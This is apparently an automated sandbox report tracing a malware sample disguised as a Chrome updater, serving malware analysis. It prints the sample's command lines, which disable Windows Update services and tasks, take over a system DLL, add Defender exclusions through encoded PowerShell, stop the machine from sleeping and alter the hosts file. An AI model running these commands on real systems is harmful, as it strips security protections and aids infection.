        command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      [depth 4] C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\system32\powercfg.exe
        command line: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken

        [depth 5] C:\Windows\system32\powercfg.exe
        command line: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken

        [depth 5] C:\Windows\system32\powercfg.exe
        command line: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken

        [depth 5] C:\Windows\system32\powercfg.exe
        command line: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe86d946f8,0x7ffe86d94708,0x7ffe86d947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5516 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5756 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x1fc,0x200,0x7ff62dad5460,0x7ff62dad5470,0x7ff62dad54804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5908 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3252 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6360 /prefetch:23⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
Downloads (files written during the run)

- C:\Program Files\Google\Chrome\updater.exe (7.1MB)
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
- C:\Users\Admin\AppData\Local\Temp\11.exe (7.1MB; identical hashes to C:\Program Files\Google\Chrome\updater.exe, so the same file)
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
- C:\Windows\system32\drivers\etc\hosts (2KB)
- \??\pipe\LOCAL\crashpad_5048_KOXSMRKMQDAMJWBC (empty)